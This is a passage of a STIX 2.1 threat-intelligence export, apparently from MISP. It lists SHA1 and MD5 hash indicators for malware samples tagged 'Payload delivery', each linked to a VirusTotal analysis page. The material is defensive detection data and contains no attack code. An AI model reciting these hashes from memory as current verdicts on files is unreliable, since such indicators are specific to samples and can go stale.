"url--58db80dd-9060-4ac9-b77c-4ba602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80dd-9060-4ac9-b77c-4ba602de0b81",
|
|
"value": "https://www.virustotal.com/file/3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f/analysis/1488347533/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80de-b444-4b75-9e76-429102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:42.000Z",
|
|
"modified": "2017-03-29T09:39:42.000Z",
|
|
"description": "sample - Xchecked via VT: 40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a",
|
|
"pattern": "[file:hashes.SHA1 = '3020ea737838cc6e03742101f405bca5947d655e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80df-e2f8-40fe-84ea-4ef302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:43.000Z",
|
|
"modified": "2017-03-29T09:39:43.000Z",
|
|
"description": "sample - Xchecked via VT: 40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a",
|
|
"pattern": "[file:hashes.MD5 = 'd2e29354c013c22ddf804720bd8df1f1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80e0-a668-4a24-9008-403e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:44.000Z",
|
|
"modified": "2017-03-29T09:39:44.000Z",
|
|
"first_observed": "2017-03-29T09:39:44Z",
|
|
"last_observed": "2017-03-29T09:39:44Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80e0-a668-4a24-9008-403e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80e0-a668-4a24-9008-403e02de0b81",
|
|
"value": "https://www.virustotal.com/file/40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a/analysis/1486735996/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e1-8b94-48de-a614-446e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:45.000Z",
|
|
"modified": "2017-03-29T09:39:45.000Z",
|
|
"description": "sample - Xchecked via VT: 88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a",
|
|
"pattern": "[file:hashes.SHA1 = '86e53d253004fede4aa95d8dad1a0a2fcfcd83d8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e2-9090-481d-8928-49de02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:46.000Z",
|
|
"modified": "2017-03-29T09:39:46.000Z",
|
|
"description": "sample - Xchecked via VT: 88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a",
|
|
"pattern": "[file:hashes.MD5 = '9a231baaede2d80a4d946713b1220456']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80e2-77b8-4bb5-9735-426b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:46.000Z",
|
|
"modified": "2017-03-29T09:39:46.000Z",
|
|
"first_observed": "2017-03-29T09:39:46Z",
|
|
"last_observed": "2017-03-29T09:39:46Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80e2-77b8-4bb5-9735-426b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80e2-77b8-4bb5-9735-426b02de0b81",
|
|
"value": "https://www.virustotal.com/file/88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a/analysis/1482479768/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e3-2c84-49ce-9af8-4a0802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:47.000Z",
|
|
"modified": "2017-03-29T09:39:47.000Z",
|
|
"description": "sample - Xchecked via VT: e7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c",
|
|
"pattern": "[file:hashes.SHA1 = 'e50858538d58dcadda56c3be434f96cc1258ec6a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e4-6d60-46f8-b358-408b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:48.000Z",
|
|
"modified": "2017-03-29T09:39:48.000Z",
|
|
"description": "sample - Xchecked via VT: e7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c",
|
|
"pattern": "[file:hashes.MD5 = '56c457926c017f0d61413a11612925c3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80e5-c404-4f70-a8b7-441d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:49.000Z",
|
|
"modified": "2017-03-29T09:39:49.000Z",
|
|
"first_observed": "2017-03-29T09:39:49Z",
|
|
"last_observed": "2017-03-29T09:39:49Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80e5-c404-4f70-a8b7-441d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80e5-c404-4f70-a8b7-441d02de0b81",
|
|
"value": "https://www.virustotal.com/file/e7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c/analysis/1469759875/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e6-e4d4-4ea2-9f44-4c8002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:50.000Z",
|
|
"modified": "2017-03-29T09:39:50.000Z",
|
|
"description": "sample - Xchecked via VT: 05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7",
|
|
"pattern": "[file:hashes.SHA1 = 'c9e2e2321bc80e1b89b48f911a0b2eca693f8a7b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e7-b7e8-4dfc-b92e-47c702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:51.000Z",
|
|
"modified": "2017-03-29T09:39:51.000Z",
|
|
"description": "sample - Xchecked via VT: 05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7",
|
|
"pattern": "[file:hashes.MD5 = 'dad8429857a749d8d4c2f964d5b68a4b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80e8-7548-4a58-b2e8-4ff902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:52.000Z",
|
|
"modified": "2017-03-29T09:39:52.000Z",
|
|
"first_observed": "2017-03-29T09:39:52Z",
|
|
"last_observed": "2017-03-29T09:39:52Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80e8-7548-4a58-b2e8-4ff902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80e8-7548-4a58-b2e8-4ff902de0b81",
|
|
"value": "https://www.virustotal.com/file/05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7/analysis/1465760906/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80e9-668c-428e-9ddd-467a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:53.000Z",
|
|
"modified": "2017-03-29T09:39:53.000Z",
|
|
"description": "sample - Xchecked via VT: 3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41",
|
|
"pattern": "[file:hashes.SHA1 = '724b73f109b87cacd7a4489df347f0d32c40a8de']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ea-be44-4dc8-a1ea-4fdc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:54.000Z",
|
|
"modified": "2017-03-29T09:39:54.000Z",
|
|
"description": "sample - Xchecked via VT: 3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41",
|
|
"pattern": "[file:hashes.MD5 = '5ceae4d60403350bfc31b135b5287931']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80eb-795c-49cd-9c07-4ad602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:55.000Z",
|
|
"modified": "2017-03-29T09:39:55.000Z",
|
|
"first_observed": "2017-03-29T09:39:55Z",
|
|
"last_observed": "2017-03-29T09:39:55Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80eb-795c-49cd-9c07-4ad602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80eb-795c-49cd-9c07-4ad602de0b81",
|
|
"value": "https://www.virustotal.com/file/3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41/analysis/1486959670/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ec-9280-4732-90e8-497a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:56.000Z",
|
|
"modified": "2017-03-29T09:39:56.000Z",
|
|
"description": "sample - Xchecked via VT: 385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf",
|
|
"pattern": "[file:hashes.SHA1 = '2fcc499fff7d71ab3b4d7ec081c58cdcde4dc313']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ed-d878-4496-9da4-4ea302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:57.000Z",
|
|
"modified": "2017-03-29T09:39:57.000Z",
|
|
"description": "sample - Xchecked via VT: 385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf",
|
|
"pattern": "[file:hashes.MD5 = 'b2968cb82ac8e5cc07ef38bd1602fae3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80ee-89b0-48d1-bc97-4a0b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:58.000Z",
|
|
"modified": "2017-03-29T09:39:58.000Z",
|
|
"first_observed": "2017-03-29T09:39:58Z",
|
|
"last_observed": "2017-03-29T09:39:58Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80ee-89b0-48d1-bc97-4a0b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80ee-89b0-48d1-bc97-4a0b02de0b81",
|
|
"value": "https://www.virustotal.com/file/385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf/analysis/1472715977/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80ef-095c-4a8d-b5d7-41e202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:39:59.000Z",
|
|
"modified": "2017-03-29T09:39:59.000Z",
|
|
"description": "sample - Xchecked via VT: 26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714",
|
|
"pattern": "[file:hashes.SHA1 = '8ca63b3c133f2803e5ec7bc0e65df6335afa5566']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:39:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f0-38bc-430d-8fe1-4aa502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:00.000Z",
|
|
"modified": "2017-03-29T09:40:00.000Z",
|
|
"description": "sample - Xchecked via VT: 26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714",
|
|
"pattern": "[file:hashes.MD5 = '2d91dd790707d7827a0d02a03653687f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80f0-fdbc-4b07-92d6-42ba02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:00.000Z",
|
|
"modified": "2017-03-29T09:40:00.000Z",
|
|
"first_observed": "2017-03-29T09:40:00Z",
|
|
"last_observed": "2017-03-29T09:40:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80f0-fdbc-4b07-92d6-42ba02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80f0-fdbc-4b07-92d6-42ba02de0b81",
|
|
"value": "https://www.virustotal.com/file/26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714/analysis/1432113714/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f1-089c-49dd-8cb9-492702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:01.000Z",
|
|
"modified": "2017-03-29T09:40:01.000Z",
|
|
"description": "sample - Xchecked via VT: 70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3",
|
|
"pattern": "[file:hashes.SHA1 = 'bd8ea561217273d8c2e72da8ded8d227a8df8a56']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f2-ee38-4dcc-a52e-473902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:02.000Z",
|
|
"modified": "2017-03-29T09:40:02.000Z",
|
|
"description": "sample - Xchecked via VT: 70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3",
|
|
"pattern": "[file:hashes.MD5 = 'db9a30733c5ae85316572a40341c441c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80f3-8f08-4042-8b81-4cfd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:03.000Z",
|
|
"modified": "2017-03-29T09:40:03.000Z",
|
|
"first_observed": "2017-03-29T09:40:03Z",
|
|
"last_observed": "2017-03-29T09:40:03Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80f3-8f08-4042-8b81-4cfd02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80f3-8f08-4042-8b81-4cfd02de0b81",
|
|
"value": "https://www.virustotal.com/file/70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3/analysis/1431675378/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f4-08d4-4bcf-8f1b-41a002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:04.000Z",
|
|
"modified": "2017-03-29T09:40:04.000Z",
|
|
"description": "sample - Xchecked via VT: 5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed",
|
|
"pattern": "[file:hashes.SHA1 = '54c7238f964cd5e6b281cd669ee23d5321a2d7ca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f5-5cd8-4af8-903b-46e302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:05.000Z",
|
|
"modified": "2017-03-29T09:40:05.000Z",
|
|
"description": "sample - Xchecked via VT: 5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed",
|
|
"pattern": "[file:hashes.MD5 = '7e7a89dcaf042024e156fccd98a9a250']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80f6-8260-4756-acf6-4aed02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:06.000Z",
|
|
"modified": "2017-03-29T09:40:06.000Z",
|
|
"first_observed": "2017-03-29T09:40:06Z",
|
|
"last_observed": "2017-03-29T09:40:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80f6-8260-4756-acf6-4aed02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80f6-8260-4756-acf6-4aed02de0b81",
|
|
"value": "https://www.virustotal.com/file/5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed/analysis/1430519164/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f7-4f4c-4d0e-9f5b-4b9b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:07.000Z",
|
|
"modified": "2017-03-29T09:40:07.000Z",
|
|
"description": "sample - Xchecked via VT: f9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d",
|
|
"pattern": "[file:hashes.SHA1 = '3714e0d16b777e68bad98a9f54325e40e4680f17']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80f8-aee0-4433-9f3c-4dff02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:08.000Z",
|
|
"modified": "2017-03-29T09:40:08.000Z",
|
|
"description": "sample - Xchecked via VT: f9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d",
|
|
"pattern": "[file:hashes.MD5 = '51914e4d3a55efbcc99f5a96fc905f46']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80f9-27dc-4cdb-b239-4d9002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:09.000Z",
|
|
"modified": "2017-03-29T09:40:09.000Z",
|
|
"first_observed": "2017-03-29T09:40:09Z",
|
|
